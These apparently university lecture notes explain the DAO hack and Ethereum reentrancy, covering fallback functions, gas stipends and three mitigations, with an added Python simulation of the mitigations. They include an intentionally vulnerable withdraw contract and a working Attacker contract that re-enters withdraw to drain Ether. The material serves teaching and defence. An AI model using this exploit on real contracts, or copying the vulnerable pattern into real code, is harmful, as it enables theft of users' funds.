Lecture 10. A2 - will post tonight - due in two weeks


The DAO - $72M USD in Ether
  Decentralized Dragon's Den or Shark Tank
  A pot of money that you could contribute to and receive voting shares for
  You vote on funding projects

The attack happened but the stolen funds sat quarantined for 30 days
  This means the stolen funds were not circulated and so a rollback was possible
  Ethereum project put in a special block that destructed the DAO contract and refunded everyone's money, but the block is invalid --- so it needs consensus of the network to make an exception and accept it
  Most went with undoing the DAO attack and this chain is called Ethereum
  Some objected and did not undo the attack --- their chain is called Ethereum Classic
  Today ETC trades at about 10% the value of Ether

The bug: reentrancy / recursive calls

Back to Ethereum
  External accounts - work like Bitcoin
  Contract accounts - running smart contracts; work by your design

Alice and Bob want to use Ethereum like Bitcoin

Use external accounts
  Alice pays Bob
  How does Bob know he was paid?
  Consulting the blockchain
  Automated by his client
  He sits down at a new paper, parses the whole blockchain to figure out the transaction history

Use a contract as a wallet with more features
  Can log all transactions in the state
  Can notify the user of transactions
  Can use multi-signatures or fancy access structures
  Ethereum client has one built in, called a wallet, and it is exposed in the UI

Alice pays Bob
  Alice pays to Bob's wallet smart contract
  Bob's wallet only runs if someone calls a function on it
  No code runs by itself on Ethereum

IDEA! What if, when you transfer money to a smart contract, that contract is allowed to run some code at that point?

Issue 1: Which function in the smart contract will run when it receives money?
  Convention that it will run a special function with a special name
  What was the name? No name (empty string)

    function() payable { }

  Fallback function
  Payable enables it to receive money when called
  Fallback function is also called if the function that is called cannot be found

Issue 2: Gas
  Who pays for the fallback function to run?
  Recall the fallback in Contract B is being triggered by Contract A sending money to the address of Contract B (for whatever reason). Someone is paying for Contract A to run this function; why should they pay for Contract B as well?
  Paying contract pays the gas but can set a gas limit when it transfers the money
  If it runs out of gas (or fails for other reasons), an exception is thrown and/or the transfer function returns a boolean of false

  address.send(10) -> send 10 wei to address -> if error, it will return false; the fallback function that is invoked is limited to 2300 gas
  address.transfer(10) -> same as send but throws an exception instead; the fallback function that is invoked is limited to 2300 gas
  address.call.value(10)() -> old school way of sending money; returns false on error; uses whatever gas is available from the calling function
  address.send(10) = address.call.gas(0).value(10)()
  address.transfer.gas(120000)(10) -> run transfer with more gas

Issue 3: Code flow control
  When you transfer money to an address and the address is a contract, you are turning control over to someone else's code that might be malicious and can do whatever it wants (within the gas you give it)

    // http://www.blunderingcode.com/writing-secure-solidity/
    contract Victim {
        mapping (address => uint) userbalances;

        function withdraw() {
            if (msg.sender.call.value(userbalances[msg.sender])()) {
                userbalances[msg.sender] = 0;
            }
        }

        function() payable {
            userbalances[msg.sender] += msg.value;
        }
    }

Contract contains a list of users and their "balances" in a ledger as the data structure, and it also contains Ether (attached to the address)

For example, contract might hold 10 Ether and have:

    A_address 5
    B_address 3
    C_address 2
    D_address 0

Alice calls withdraw. She does it from an account. msg.sender will be her account.
Withdraw finds the balance of her account (5), as stored in userbalances, and transfers her that amount of money (5). ****
If it succeeds, her balance is made to be 0. If it does not, the balance does not update.
During **** Alice gets to run her fallback function

    if (msg.sender.call.value(userbalances[msg.sender])()) {

Alice's fallback function: What if Alice, in her fallback function, calls withdraw again?

    if (msg.sender.call.value(userbalances[msg.sender])())
    // if (alice.call.value(5)())...
    // if (alice.call.value(5)() -> Alice's fallback)
    // if ( Alice's fallback )
    // if ( withdraw )
    // if ( if (alice.call.value(5)()) )
    // if ( if ( if ( if ())))

Example of fallback function

    contract Attacker {
        Victim v;

        function Attacker(address dest) {
            v = Victim(dest);
        }

        function attack() {
            v.call.value(msg.value)();
            v.withdraw();
        }

        function() payable {
            if (msg.gas > 100000) {
                v.withdraw();
            }
        }
    }

Mitigations: 3 approaches (not mutually exclusive)

1) Don't use call to send money, use transfer or send --> fallback function still runs but it is limited in terms of gas to 2300 (which is thought to not be enough to do anything malicious)

2) Do the logic that updates the state before (not after) calling the transfer function

    uint balance = userbalances[msg.sender];
    // zero the ledger entry first, so a re-entrant withdraw sees 0
    userbalances[msg.sender] = 0;
    if (!msg.sender.call.value(balance)()) {
        // the send failed: put the balance back
        userbalances[msg.sender] = balance;
    }

3) Control flow integrity -> lock down who can enter a function and from where
  Locks -> States
  State machine where, before withdraw is called, the state is "open"; the first line of withdraw checks that the state is open; the second changes the state to closed; then you add your code

    enum States { Open, Closed }
    States state; // defaults to Open, the first enum member

    function withdraw() {
        require(state == States.Open);
        state = States.Closed;
        if (msg.sender.call.value(userbalances[msg.sender])()) {
            userbalances[msg.sender] = 0;
        }
        state = States.Open;
    }
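The withdraw walk-through and the three mitigations above can be compared side by side in a small call-stack model. This is an added example, not code from the lecture or from the linked post: a simplified Python model rather than EVM-accurate Solidity, and the names `run`, `_pay`, `FRAME_COST` and the starting gas are assumptions made for illustration.

```python
# Toy call-stack model (constructed); names and gas costs are assumptions.
class Revert(Exception): pass  # thrown exception that unwinds a call frame
FRAME_COST, STIPEND = 50_000, 2300  # constructed call cost; send/transfer stipend

class Victim:
    def __init__(self, ledger, mode):
        self.userbalances = dict(ledger)
        self.ether = sum(ledger.values())  # Ether held at the contract address
        self.mode = mode  # "call", "send", "update_first" or "lock"
        self.is_open = True  # only checked in "lock" mode

    def _pay(self, to, amount, gas):
        if amount > self.ether:
            return False  # not enough Ether: the fallback never runs
        self.ether -= amount
        to.ether += amount
        try:
            to.fallback(self, gas)  # control passes to the recipient's code
            return True
        except Revert:
            self.ether += amount  # failed frame: the value transfer is undone
            to.ether -= amount
            return False

    def withdraw(self, sender, gas):
        if self.mode == "lock" and not self.is_open:
            raise Revert("re-entered while closed")
        self.is_open = False
        balance = self.userbalances[sender.name]
        if self.mode == "update_first":
            self.userbalances[sender.name] = 0  # state change before the send
        fwd = STIPEND if self.mode == "send" else gas - FRAME_COST
        if self._pay(sender, balance, fwd):
            self.userbalances[sender.name] = 0
        elif self.mode == "update_first":
            self.userbalances[sender.name] = balance  # restore on failed send
        self.is_open = True

class Attacker:
    def __init__(self):
        self.name, self.ether = "A_address", 0
    def fallback(self, victim, gas):
        if gas > 100000:  # same guard as the page's Attacker fallback
            victim.withdraw(self, gas)

def run(mode):
    ledger = {"A_address": 5, "B_address": 3, "C_address": 2, "D_address": 0}
    victim, alice = Victim(ledger, mode), Attacker()
    victim.withdraw(alice, 1_000_000)  # constructed starting gas
    return alice.ether, victim.ether, victim.userbalances["A_address"]
```

`run(mode)` returns Alice's Ether, the contract's remaining Ether and Alice's ledger entry. In "call" mode the contract is emptied while B and C still show 3 and 2 on the ledger; in "lock" mode the re-entrant call throws, so the outer send fails and Alice's entry stays at 5.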